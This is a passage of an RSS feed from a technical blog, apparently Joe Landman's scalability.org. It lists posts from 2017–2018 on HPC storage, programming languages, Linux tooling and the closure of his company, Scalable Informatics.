      <description>So &amp;hellip; Suppose someone comes up to you and makes a claim. This claim isn&amp;rsquo;t backed by facts, merely by unicorns, rainbows, and their own biases. Yeah, this kind of relates to the previous post. They argue based upon the claim. Stake out their ground. Insist that &amp;ldquo;none shall pass&amp;rdquo; in a black knight, Monty Python esq manner. But they are wrong. Simply, factually wrong. Regardless of their biases, you and many others have been demonstrating the very thing that is claimed to be impossible, to customers for years.</description>
    </item>
    
    <item>
      <title>On technology zealotry</title>
      <link>https://blog.scalability.org/2018/05/on-technology-zealotry/</link>
      <pubDate>Tue, 29 May 2018 15:38:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/05/on-technology-zealotry/</guid>
      <description>I&amp;rsquo;ve encountered this in my career, at many places. Sadly, early in my career, I participated in some of this. You are a zealot for a particular form of tech if you can see it do no wrong, and decry reports of issues or problems as &amp;ldquo;attacks&amp;rdquo;. You are a zealot against a particular form of tech if you cannot see it as a potentially useful and valuable portion of a solution stack, and (often gleefully) amplify reports of issues or problems.</description>
    </item>
    
    <item>
      <title>Interesting post on mixed integer programming for diets ... that has some hilarious output</title>
      <link>https://blog.scalability.org/2018/05/interesting-post-on-mixed-integer-programming-for-diets-that-has-some-hilarious-output/</link>
      <pubDate>Mon, 28 May 2018 20:28:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/05/interesting-post-on-mixed-integer-programming-for-diets-that-has-some-hilarious-output/</guid>
      <description>I am a fan of the Julia language. Tremendously powerful analytical environment, compiled, high performance, easy to understand and use, strongly typed, &amp;hellip; there&amp;rsquo;s a long list of reasons why I like it. If you are doing analytics, modeling, computation in other languages, it is definitely worth a look. Think of it as python, compiled, with multiple dispatch and strong typing &amp;hellip; and no indent-as-structure problem. My Julia fanboi-ism aside, there was an interesting blog post about using JuMP, a linear programming environment for Julia.</description>
    </item>
    
    <item>
      <title>Distribution package dependency radii, or why distros may be doomed</title>
      <link>https://blog.scalability.org/2018/04/distribution-package-dependency-radii-or-why-distros-may-be-doomed/</link>
      <pubDate>Tue, 24 Apr 2018 16:10:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/04/distribution-package-dependency-radii-or-why-distros-may-be-doomed/</guid>
      <description>I am a sucker for a good editor. I like atom. Don&amp;rsquo;t yell at me. Its pretty good for my use cases. It has lots of nice extensions I can and have used. Atom is not without its dependencies though. Installing it, which should be relatively simple, turns out to be &amp;hellip; well &amp;hellip; interesting.
[root@centos7build nyble]# rpm -ivh ~/atom.x86_64.rpm error: Failed dependencies: libXss.so.1()(64bit) is needed by atom-1.26.0-0.1.x86_64  In searching the interwebs for what Xss is, I happened across this little tidbit</description>
    </item>
    
    <item>
      <title>NyBLE</title>
      <link>https://blog.scalability.org/2018/04/nyble/</link>
      <pubDate>Sun, 22 Apr 2018 20:54:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/04/nyble/</guid>
      <description>So there I am updating my new repository to enable using zfs in the ramboot images. This is a simplification and continuation of the previous work I did a few years ago, with some massive code cleanups. And sadly, no documentation yet. Will fix soon, but for now, I am trying to hit the major functionality points. NyBLE is a linux environment for hypervisor hosts. It builds on the old open source SIOS work, and extends it in significant ways.</description>
    </item>
    
    <item>
      <title>Dealing with disappointment</title>
      <link>https://blog.scalability.org/2018/04/dealing-with-disappointment/</link>
      <pubDate>Thu, 19 Apr 2018 19:13:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/04/dealing-with-disappointment/</guid>
      <description>In the last few years, I&amp;rsquo;ve had major disappointments professionally. The collapse of Scalable, some of the positively ridiculous things associated with the aftermath of that, none of which I&amp;rsquo;ve written about until they are over. Almost over, but not quite. Waiting for confirmation. My job search last year, and some of the disappointment associated with that. Recently I&amp;rsquo;ve had different type of disappointments, without getting into details. The way I&amp;rsquo;ve dealt with these things in the past has been to try to understand if there was a conflict, what could I have done better.</description>
    </item>
    
    <item>
      <title>Late Feb 2018 update</title>
      <link>https://blog.scalability.org/2018/02/late-feb-2018-update/</link>
      <pubDate>Thu, 22 Feb 2018 19:03:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/02/late-feb-2018-update/</guid>
      <description>Again, many apologies over the low posting frequency. Several things that are nearing completion (hopefully soon) that I want finalized first. That said, the major news is that this site is now on a much improved server and network. I&amp;rsquo;ve switched from Comcast Business to WOW business. So far, much better speed, more consistent performance, far lower cost per bandwidth. I do have lots to write about, and have been saving things up until after this particular objective is met, so I can work/write distraction free.</description>
    </item>
    
    <item>
      <title>Apologies on the slow posting rate</title>
      <link>https://blog.scalability.org/2017/12/apologies-on-the-slow-posting-rate/</link>
      <pubDate>Wed, 13 Dec 2017 14:18:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/12/apologies-on-the-slow-posting-rate/</guid>
      <description>Many things are going on simultaneously right now, and I have little time to compose thoughts for the blog. I anticipate a bit of a letup in the next week or two as the year comes to a close.</description>
    </item>
    
    <item>
      <title>Cool bug on upgrade (not)</title>
      <link>https://blog.scalability.org/2017/11/cool-bug-on-upgrade-not/</link>
      <pubDate>Tue, 21 Nov 2017 05:22:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/11/cool-bug-on-upgrade-not/</guid>
      <description>Wordpress is an interesting beast. Spent hours working through issues that I shouldn&amp;rsquo;t have needed to on an upgrade, as some functions were deprecated. In an interesting way. By removing them, and throwing an error. Which I found only through looking at a specific log. So out goes that plugin. And the site is back.</description>
    </item>
    
    <item>
      <title>Put my Riemann Zeta Function sum reduction code on github</title>
      <link>https://blog.scalability.org/2017/11/put-my-riemann-zeta-function-sum-reduction-code-on-github/</link>
      <pubDate>Sat, 11 Nov 2017 17:44:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/11/put-my-riemann-zeta-function-sum-reduction-code-on-github/</guid>
      <description>Repo is here: https://github.com/joelandman/rzf. There&amp;rsquo;s a lightning talk to go along with it, and I&amp;rsquo;ll make sure I can get it together for this as well.</description>
    </item>
    
    <item>
      <title>#SC17</title>
      <link>https://blog.scalability.org/2017/11/sc17/</link>
      <pubDate>Thu, 09 Nov 2017 13:16:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/11/sc17/</guid>
      <description>I&amp;rsquo;ve had numerous requests from friends and colleagues about whether I will be attending #SC17 this year. Sadly, this is not to be the case. $dayjob has me attending an onsite meeting that week in San Francisco, and the schedule was such that I could not attend the talks I was interested in. I&amp;rsquo;d love for there to be a way to listen to the talks remotely. Maybe I&amp;rsquo;ll simply buy the DVD/USB stick of the talks if there is an online store for them.</description>
    </item>
    
    <item>
      <title>Disk, SSD, NVMe preparation tools cleaned up and on GitHub</title>
      <link>https://blog.scalability.org/2017/09/disk-ssd-nvme-preparation-tools-cleaned-up-and-on-github/</link>
      <pubDate>Thu, 14 Sep 2017 13:26:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/09/disk-ssd-nvme-preparation-tools-cleaned-up-and-on-github/</guid>
      <description>These are a collection of (MIT licensed) tools I&amp;rsquo;ve been working on for years to automate some of the major functionality one needs when setting up/using new machines with lots of disks/SSD/NVMe. The repo is here: https://github.com/joelandman/disk_test_setup . I will be adding some sas secure erase and formatting tools into this. These tools wrap other lower level tools, and handle the process of automating common tasks you worry about when you are setting up and testing a machine with many drives.</description>
    </item>
    
    <item>
      <title>Aria2c for the win!</title>
      <link>https://blog.scalability.org/2017/09/aria2c-for-the-win/</link>
      <pubDate>Wed, 06 Sep 2017 02:46:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/09/aria2c-for-the-win/</guid>
      <description>I&amp;rsquo;ve not heard of aria2c before today. Sort of a super wget as far as I could tell. Does parallel transfers to reduce data motion time, if possible. So I pulled it down, built it. I have some large data sets to move. And a nice storage area for them. Ok. Fire it up to pull down a 2GB file. Much faster than wget on the same system over the same network.</description>
    </item>
    
    <item>
      <title>Working on benchmarking ML frameworks</title>
      <link>https://blog.scalability.org/2017/09/working-on-benchmarking-ml-frameworks/</link>
      <pubDate>Tue, 05 Sep 2017 20:06:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/09/working-on-benchmarking-ml-frameworks/</guid>
      <description>Nice machine we have here &amp;hellip;
root@hermes:/data/tests# lspci | egrep -i &#39;(AMD|NVidia)&#39; | grep VGA 3b:00.0 VGA compatible controller: &amp;lt;a href=&amp;quot;http://www.pny.com/nvidia-quadro-gp100&amp;quot;&amp;gt;NVIDIA Corporation GP100GL&amp;lt;/a&amp;gt; (rev a1) 88:00.0 VGA compatible controller: Advanced Micro Devices, Inc. [AMD/ATI] &amp;lt;a href=&amp;quot;http://www.tomshardware.com/reviews/amd-radeon-vega-frontier-edition-16gb,5128.html&amp;quot;&amp;gt;Vega 10 XTX&amp;lt;/a&amp;gt; [Radeon Vega Frontier Edition]  I want to see how tensorflow and many others run on each of the cards. The processor is no slouch either:
root@hermes:/data/tests# lscpu | grep &amp;quot;Model name&amp;quot; Model name: Intel(R) Xeon(R) Gold 6134 CPU @ 3.</description>
    </item>
    
    <item>
      <title>Oracle finally kills off Solaris and SPARC</title>
      <link>https://blog.scalability.org/2017/09/oracle-finally-kills-off-solaris-and-sparc/</link>
      <pubDate>Mon, 04 Sep 2017 17:24:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/09/oracle-finally-kills-off-solaris-and-sparc/</guid>
      <description>This was making the rounds last week. Oracle seems to have a leak in its process, creating labels that trigger event notifications for people, for their packages. Solaris was decimated. More details at the links and at The Layoff. Honestly I had expected them to reach this point. I am guessing that they were contractually obligated for at least 7 years to provide Solaris/SPARC support to US government purchasers. SGI went through a similar thing with IRIX.</description>
    </item>
    
    <item>
      <title>M&amp;A and business things</title>
      <link>https://blog.scalability.org/2017/09/ma-and-business-things/</link>
      <pubDate>Mon, 04 Sep 2017 16:45:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/09/ma-and-business-things/</guid>
      <description>First up, Tegile was acquired by Western Digital (WDC). This is in part due to WDC&amp;rsquo;s desire to be a one stop shop vertically integrated supplier for storage parts, systems, etc. This is how all of the storage parts OEMs needed to move, though Seagate failed to execute this correctly, selling off their array business in part to Cray. Toshiba &amp;hellip; well &amp;hellip; they have some existential challenges right now, and are about to sell off their profitable flash and memory systems business, if they can just get everyone to agree &amp;hellip; This comes from the fact that spinning disk, while a venerable technology, has been effectively completely commoditized.</description>
    </item>
    
    <item>
      <title>A completed project: mysqldump file to CSV converter</title>
      <link>https://blog.scalability.org/2017/08/a-completed-project-mysqldump-file-to-csv-converter/</link>
      <pubDate>Thu, 31 Aug 2017 02:23:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/08/a-completed-project-mysqldump-file-to-csv-converter/</guid>
      <description>This was part of something else I&amp;rsquo;d worked on, but it never saw the light of day for a number of (rather silly) reasons. So rather than let these bits go to waste, I created a github repo for posterity. Someone might be able to make effective use of them somewhere. Repo is located here: https://github.com/joelandman/msd2csv Pretty simple code, does most of the work in-memory, and multiple regex passes to transform and clean up the CSV.</description>
    </item>
    
    <item>
      <title>Finally got to use MCE::* in a project</title>
      <link>https://blog.scalability.org/2017/08/finally-got-to-use-mce-in-a-project/</link>
      <pubDate>Thu, 17 Aug 2017 13:45:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/08/finally-got-to-use-mce-in-a-project/</guid>
      <description>There are a set of modules in the Perl universe that I&amp;rsquo;ve been looking for an excuse to use for a while. They are the MCE set of modules, which purportedly enable easy concurrency and parallelism, exploiting many core CPUs, and a number of techniques. Sure enough, I had a task to handle recently that required this. I looked at many alternatives, and played with a few, including Parallel::Queue. I thought of writing my own with IPC::Run as I was already using it in the project, but I didn&amp;rsquo;t want to lose focus on the mission, and re-invent a wheel that already existed elsewhere.</description>
    </item>
    
    <item>
      <title>Cray &#34;acquires&#34; ClusterStor business unit from Seagate</title>
      <link>https://blog.scalability.org/2017/07/cray-acquires-clusterstor-business-unit-from-seagate/</link>
      <pubDate>Fri, 28 Jul 2017 19:57:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/07/cray-acquires-clusterstor-business-unit-from-seagate/</guid>
      <description>Information at this link. It is being called a &amp;ldquo;strategic transaction&amp;rdquo;, though it likely came about vis-a-vis Seagate doing some profound and deep thinking over what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. They acquired ClusterStor as part of a preceding transaction of Xyratex. Xyratex was the basis for the Cray storage platforms (post Enginio).</description>
    </item>
    
    <item>
      <title>More unix command line humor</title>
      <link>https://blog.scalability.org/2017/06/more-unix-command-line-humor/</link>
      <pubDate>Mon, 26 Jun 2017 15:07:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/06/more-unix-command-line-humor/</guid>
      <description></description>
    </item>
    
    <item>
      <title>What reduces risk ... a great engineering and support team, or a brand name ?</title>
      <link>https://blog.scalability.org/2017/06/what-reduces-risk-a-great-engineering-and-support-team-or-a-brand-name/</link>
      <pubDate>Mon, 26 Jun 2017 14:39:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/06/what-reduces-risk-a-great-engineering-and-support-team-or-a-brand-name/</guid>
      <description>I&amp;rsquo;ve written about approved vendors and &amp;ldquo;one throat to choke&amp;rdquo; concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems &amp;hellip; was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk whom might have something of interest, and the larger folk who might come in with a different ecosystem.</description>
    </item>
    
    <item>
      <title>On hackerrank and Julia</title>
      <link>https://blog.scalability.org/2017/06/on-hackerrank-and-julia/</link>
      <pubDate>Wed, 14 Jun 2017 13:19:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/06/on-hackerrank-and-julia/</guid>
      <description>My new day job has me developing considerably less code than my previous endeavor, so I like to work on problems to keep these particular muscles in steady use. Happily, I get to do more analytics than ever before, so this at least is some compensation for the lower amount of coding. When I work on coding for myself, I&amp;rsquo;ll play with problems from my research days, or small throw-away ones, like on Hackerrank.</description>
    </item>
    
    <item>
      <title>The birthday problem (allocation collisions) for networks and MAC addresses</title>
      <link>https://blog.scalability.org/2017/06/the-birthday-problem-allocation-collisions-for-networks-and-mac-addresses/</link>
      <pubDate>Wed, 07 Jun 2017 15:09:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/06/the-birthday-problem-allocation-collisions-for-networks-and-mac-addresses/</guid>
      <description>The birthday problem is a fairly simple to state situation. There is at least a 50% probability (e.g. even chance) that at least 2 of 23 randomly chosen people in a room have the same birthday. This comes from some elementary applications of statistics, and is documented on Wikipedia. While we care less about networks celebrating their annual journey around Sol, we care more about potential address collisions for statically assigned IP addresses.</description>
    </item>
    
    <item>
      <title>Now for your bidding pleasure, the contents of one company</title>
      <link>https://blog.scalability.org/2017/06/now-for-your-bidding-pleasure-the-contents-of-one-company/</link>
      <pubDate>Fri, 02 Jun 2017 15:22:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/06/now-for-your-bidding-pleasure-the-contents-of-one-company/</guid>
      <description>This is an on-going process I won&amp;rsquo;t comment on, other than to provide a link to the bidding site. There are numerous cool items in there.
 Lot 2-57207: a 64 bay siFlash/Cadence machine with 64x 400GB SAS SSDs. Fully operational, SSDs very lightly used, extraordinarily fast unit. Lot 2-57215: 2 mac minis (one was my desktop unit) Lot 2-57216: My old Macbook pro, 750 GB SSD, 16 GB ram, NVidia gfx Lot 2-57081: Mac pro tower unit Lot 2-57232: a bunch of awesome monitors Lot 2-57222: Mini 24U rack with PDUs Lot 2-57015: Supermicro Twin 2U system (5 others just like it) Lot 2-57100: a 40 core 256GB testbed machine  And many other computer systems, parts, etc.</description>
    </item>
    
    <item>
      <title>One door has closed, another has opened</title>
      <link>https://blog.scalability.org/2017/04/one-door-has-closed-another-has-opened/</link>
      <pubDate>Fri, 14 Apr 2017 14:54:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/04/one-door-has-closed-another-has-opened/</guid>
      <description>As I had written previously, my old company, Scalable Informatics, has closed. Read that posting to see why and how, but as with all things &amp;hellip; we must move forward. It is cliche&#39; to use the title phrase. But it is also true. We know the door that closed. It&amp;rsquo;s the door that has opened afterwards that I am focusing upon. I have joined Joyent to work on, as it turns out, many similar things to what I did at Scalable.</description>
    </item>
    
    <item>
      <title>Hard disk shipments dropped 10% QoQ, 2% YoY</title>
      <link>https://blog.scalability.org/2017/04/hard-disk-shipments-dropped-10-qoq-2-yoy/</link>
      <pubDate>Tue, 11 Apr 2017 13:22:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/04/hard-disk-shipments-dropped-10-qoq-2-yoy/</guid>
      <description>This jives very well with what I&amp;rsquo;ve observed. Decreasing demand for enterprise storage hard disks, or as I call them &amp;ldquo;Spinning Rust Drives&amp;rdquo; (or SRD) as compared with SSD (Solid State Drives). The summary is here with a key quote being
Again, jives well with what I&amp;rsquo;ve observed. Mellanox has a good take on its blog, noting that
This is a critical point. While SRD are dropping in volume, there is not enough SSD fab capacity to supply the market demand.</description>
    </item>
    
    <item>
      <title>Selling #HPC things on ebay</title>
      <link>https://blog.scalability.org/2017/04/selling-hpc-things-on-ebay/</link>
      <pubDate>Wed, 05 Apr 2017 13:52:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/04/selling-hpc-things-on-ebay/</guid>
      <description>Given that the (now former) day job has ended, I am selling some of the old day job&amp;rsquo;s assets on ebay. We&amp;rsquo;ve sold some siFlash, Unison, and have current listings for Arista and Mellanox switches. More stuff will be listed in short order, check it out here. Feel free to reach out to me at joe.landman at the google mail thingy if you want to talk about any of these things, or buy before I list them.</description>
    </item>
    
    <item>
      <title>I always love these breathless stories of great speed, and how VCs love them ...</title>
      <link>https://blog.scalability.org/2017/04/i-always-love-these-breathless-stories-of-great-speed-and-how-vcs-love-them/</link>
      <pubDate>Tue, 04 Apr 2017 13:46:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/04/i-always-love-these-breathless-stories-of-great-speed-and-how-vcs-love-them/</guid>
      <description>Though, when I look at the &amp;ldquo;great speed&amp;rdquo;, it is often on par with or less than Scalable Informatics sustained years before. From 2013 SC13 show, on the show floor, after blasting through a POC at unheard of speed, and setting long standing records in the STAC-M3 benchmarks &amp;hellip;
Article in question is in the Register. Some of the speeds and feeds:
 * 200 microsecs latency * 45GBps read bandwidth * 15GBps write bandwidth * 7 million IOPS  But then &amp;hellip; a fibre connection.</description>
    </item>
    
    <item>
      <title>pcilist: because sometimes you really, really need to know how your PCIe devices are configured</title>
      <link>https://blog.scalability.org/2017/03/pcilist-because-sometimes-you-really-really-need-to-know-how-your-pcie-devices-are-configured/</link>
      <pubDate>Wed, 29 Mar 2017 02:41:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/03/pcilist-because-sometimes-you-really-really-need-to-know-how-your-pcie-devices-are-configured/</guid>
      <description>If you don&amp;rsquo;t know what I am talking about here, that&amp;rsquo;s fine. I&amp;rsquo;ll assume you don&amp;rsquo;t do hardware, or you call someone else when there is a hardware problem. If you think &amp;ldquo;well gee, don&amp;rsquo;t we have lspci? so why do we need this?&amp;rdquo; then you probably have not really tried to use lspci to find this information, or didn&amp;rsquo;t know it was available. Ok &amp;hellip; what I am talking about.</description>
    </item>
    
    <item>
      <title>Requiem</title>
      <link>https://blog.scalability.org/2017/03/requiem/</link>
      <pubDate>Wed, 22 Mar 2017 14:12:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/03/requiem/</guid>
      <description>This is the post an entrepreneur hopes to never write. They pour their energy, their time, their resources, their love into their baby. Trying to make her live, trying to make her grow. And for a while, she seems to. Everything is hitting the right way, 12+ years of uninterrupted growth and profitable operation as an entirely bootstrapped company. Market leading &amp;hellip; no &amp;hellip; dominating &amp;hellip; from the metrics customers tell you are important &amp;hellip; position.</description>
    </item>
    
    <item>
      <title>Some updates coming soon</title>
      <link>https://blog.scalability.org/2017/03/some-updates-coming-soon/</link>
      <pubDate>Sat, 18 Mar 2017 12:56:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/03/some-updates-coming-soon/</guid>
      <description>I should have something interesting to talk about over the next two weeks, though a summary of this is Scalable Informatics is undergoing a transformation. The exact form of this transformation is still being determined. In any case, I am no longer at Scalable. Some items of note in recent weeks.
 M&amp;amp;A;: Nimble was purchased by HPE. Not sure of the specifics of &amp;ldquo;why&amp;rdquo;, other than HPE didn&amp;rsquo;t have much in this space.</description>
    </item>
    
    <item>
      <title>Best comment I&#39;ve seen in a bug report about a tool</title>
      <link>https://blog.scalability.org/2017/03/best-comment-ive-seen-in-a-bug-report-about-a-tool/</link>
      <pubDate>Thu, 16 Mar 2017 18:54:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/03/best-comment-ive-seen-in-a-bug-report-about-a-tool/</guid>
      <description>So &amp;hellip; gnome-terminal has been my standard cli interface on linux GUIs for a while. I can&amp;rsquo;t bring myself to use KDE for any number of reasons. Gnome itself went in strange directions, so I&amp;rsquo;ve been using Cinnamon atop Mint and Debian 8. Ok, Debian 8. Gnome-terminal. Some things missing when you right mouse button click. Like &amp;ldquo;open new tab&amp;rdquo;. Open new window is there. This works. But no tab entry.</description>
    </item>
    
    <item>
      <title>structure by indentation ... grrrr ....</title>
      <link>https://blog.scalability.org/2017/03/structure-by-indentation-grrrr/</link>
      <pubDate>Sun, 05 Mar 2017 20:56:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/03/structure-by-indentation-grrrr/</guid>
      <description>If you have to do this:
:%s/\t/ /g  in order to get a very simple function to compile because of this error
 File &amp;quot;./snd.py&amp;quot;, line 13 return sum ^ IndentationError: unindent does not match any outer indentation level  even though your editor (atom!!!!??!?!) wasn&amp;rsquo;t showing you these mixed tabs and spaces &amp;hellip; Yeah, there is something profoundly wrong with the approach. The function in question was all of 10 lines.</description>
    </item>
    
    <item>
      <title>What is old, is new again</title>
      <link>https://blog.scalability.org/2017/03/what-is-old-is-new-again/</link>
      <pubDate>Thu, 02 Mar 2017 15:26:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/03/what-is-old-is-new-again/</guid>
      <description>Way back in the pre-history of the internet (really DARPA-net/BITNET days), while dinosaur programming languages frolicked freely on servers with &amp;ldquo;modern&amp;rdquo; programming systems and data sets, there was a push to go from a static linking programs to a more modular dynamic linking. The thought processes were that it would save precious memory, not having many copies of libc statically linked in to binaries. It would reduce file sizes, as most of your code would be in libraries.</description>
    </item>
    
    <item>
      <title>That was fun: mysql update nuked remote access</title>
      <link>https://blog.scalability.org/2017/02/that-was-fun-mysql-update-nuked-remote-access/</link>
      <pubDate>Thu, 23 Feb 2017 17:02:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/02/that-was-fun-mysql-update-nuked-remote-access/</guid>
      <description>Update your packages, they said. It will be more secure, they said. I guess it was. No network access to the databases. Even after turning the database server instance to listen again on the right port, I had to go in and redo the passwords and privileges. So yeah, this broke my MySQL instance for a few hours. Took longer to debug as it was late at night and I was sleepy, so I put it off until morning with caffeine.</description>
    </item>
    
    <item>
      <title>An article on Rust language for astrophysical simulation</title>
      <link>https://blog.scalability.org/2017/02/an-article-on-rust-language-for-astrophysical-simulation/</link>
      <pubDate>Mon, 13 Feb 2017 14:26:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/02/an-article-on-rust-language-for-astrophysical-simulation/</guid>
      <description>It is a short read, and you can find it on arxiv. They tackled an integration problem, basically using the code to perform a relatively simple trajectory calculation for a particular N-body problem. A few things lept out at me during my read. First, the example was fairly simplistic &amp;hellip; a leapfrog integrator, and while it is a symplectic integrator, this particular algorithm not quite high enough order to capture all the features of the N-body interaction they were working on.</description>
    </item>
    
    <item>
      <title>Brings a smile to my face ... #BioIT #HPC accelerator</title>
      <link>https://blog.scalability.org/2017/02/brings-a-smile-to-my-face-bioit-hpc-accelerator/</link>
      <pubDate>Thu, 09 Feb 2017 22:21:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/02/brings-a-smile-to-my-face-bioit-hpc-accelerator/</guid>
      <description>Way way back in the early aughts (2000&amp;rsquo;s), we had built a set of designs for an accelerator system to speed up things like BLAST, HMMer, and other codes. We were told that no one would buy such things, as the software layer was good enough and people didn&amp;rsquo;t want black boxes. This was part of an overall accelerator strategy that we had put together at the time, and were seeking to raise capital to build.</description>
    </item>
    
    <item>
      <title>Another article about the supply crisis hitting #SSD, #flash, #NVMe, #HPC #storage in general</title>
      <link>https://blog.scalability.org/2017/02/another-article-about-the-supply-crisis-hitting-ssd-flash-nvme-hpc-storage-in-general/</link>
      <pubDate>Tue, 07 Feb 2017 14:00:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/02/another-article-about-the-supply-crisis-hitting-ssd-flash-nvme-hpc-storage-in-general/</guid>
      <description>I&amp;rsquo;ve been trying to help Scalable Informatics customers understand these market realities for a while. Unfortunately, to my discredit, I&amp;rsquo;ve not been very successful at doing so &amp;hellip; and many groups seem to assume supply is plentiful and cheap across all storage modalities. Not true. And not likely true for at least the rest of the year, if not longer. This article goes into some depth that I&amp;rsquo;ve tried to explain to others in phone conversations, private email threads.</description>
    </item>
    
    <item>
      <title>A nice shout out in ComputerWeekly.com about @scalableinfo #HPC #storage</title>
      <link>https://blog.scalability.org/2017/01/a-nice-shout-out-in-computerweekly-com-about-scalableinfo-hpc-storage/</link>
      <pubDate>Wed, 25 Jan 2017 17:35:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/a-nice-shout-out-in-computerweekly-com-about-scalableinfo-hpc-storage/</guid>
      <description>See the article here.
They mention Axellio, and on The Reg article on their ISE product, they say &amp;ldquo;X-IO partners using Axellio will be able to compete with DSSD, Mangstor and Zstor and offer what EMC has characterised as face-melting performance.&amp;rdquo; Hey, we were the first to come up with &amp;ldquo;face melting performance&amp;rdquo;. More than a year ago. And it really wasn&amp;rsquo;t us, but my buddy Dr. James Cuff of Harvard.</description>
    </item>
    
    <item>
      <title>when you eliminate the impossible, what is left, no matter how improbable, is likely the answer</title>
      <link>https://blog.scalability.org/2017/01/when-you-eliminate-the-impossible-what-is-left-no-matter-how-improbable-is-likely-the-answer/</link>
      <pubDate>Wed, 25 Jan 2017 17:20:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/when-you-eliminate-the-impossible-what-is-left-no-matter-how-improbable-is-likely-the-answer/</guid>
      <description>This is a fun one. A customer has quite a collection of all-flash Unison units. A while ago, they asked us to turn on LLDP support for the units. It has some value for a number of scenarios. Later, they asked us to turn it off. So we removed the daemon. Unison ceased generating/consuming LLDP packets. Or so we thought. Fast forward to last week. We are being told that LLDP PDUs are being generated by the kit.</description>
    </item>
    
    <item>
      <title>Virtualized infrastructure, with VM storage on software RAID &#43; a rebuild == occasional VM pauses</title>
      <link>https://blog.scalability.org/2017/01/virtualized-infrastructure-with-vm-storage-on-software-raid-a-rebuild-occasional-vm-pauses/</link>
      <pubDate>Sun, 22 Jan 2017 21:09:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/virtualized-infrastructure-with-vm-storage-on-software-raid-a-rebuild-occasional-vm-pauses/</guid>
      <description>Not what I was hoping for. I may explain more of what I am doing later (less interesting than why I am doing it), but suffice it to say that I&amp;rsquo;ve got a machine I&amp;rsquo;ve turned into a VM/container box, so I can build something I need to build. This box has a large RAID6 for storage. Spinning disk. Fairly well optimized, I get good performance out of it. The box has ample CPU, and ample memory.</description>
    </item>
    
    <item>
      <title>A new #HPC project on github, nlytiq-base</title>
      <link>https://blog.scalability.org/2017/01/a-new-hpc-project-on-github-nlytiq-base/</link>
      <pubDate>Sat, 21 Jan 2017 02:53:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/a-new-hpc-project-on-github-nlytiq-base/</guid>
      <description>Another itch I&amp;rsquo;ve been wanting to scratch for a very long time. I had internal versions of a small version of this for a while, but I wasn&amp;rsquo;t happy with them. The makefiles were brittle. The builds, while automated, would fail, quite often, for obscure reasons. And I want a platform to build upon, to enable others to build upon. Not OpenHPC which is more about the infrastructure one needs for building/running high performance computing systems.</description>
    </item>
    
    <item>
      <title>There are real, and subtle differences between su and sudo</title>
      <link>https://blog.scalability.org/2017/01/there-are-real-and-subtle-differences-between-su-and-sudo/</link>
      <pubDate>Thu, 19 Jan 2017 15:03:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/there-are-real-and-subtle-differences-between-su-and-sudo/</guid>
      <description>Most of the time, sudo just works. Every now and then, it doesn&amp;rsquo;t. Most recently was with a build I am working on, where I got a &amp;ldquo;permission denied&amp;rdquo; error for creating a directory. The reason for this was non-obvious at first. You &amp;ldquo;are&amp;rdquo; superuser after all when you sudo, right? Aren&amp;rsquo;t you? Sort of. Your effective user ID has been set to the superuser. Your real user ID still is yours.</description>
    </item>
    
    <item>
      <title>Combine these things, and get a very difficult to understand customer service</title>
      <link>https://blog.scalability.org/2017/01/combine-these-things-and-get-a-very-difficult-to-understand-customer-service/</link>
      <pubDate>Wed, 18 Jan 2017 20:24:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2017/01/combine-these-things-and-get-a-very-difficult-to-understand-customer-service/</guid>
      <description>In the process of disconnecting a service we don&amp;rsquo;t need anymore. So I call their number. Obviously reroutes to a remote call center. One where english is not the primary language. I&amp;rsquo;m ok with this, but the person has a very thick and hard to understand accent. Their usage and idiom were not American, or British English. This also complicates matters somewhat, but I am used to it. I can infer where they were from, from their usage.</description>
    </item>
    
    <item>
      <title>SSD/flash/memory shortage, day N&#43;1</title>
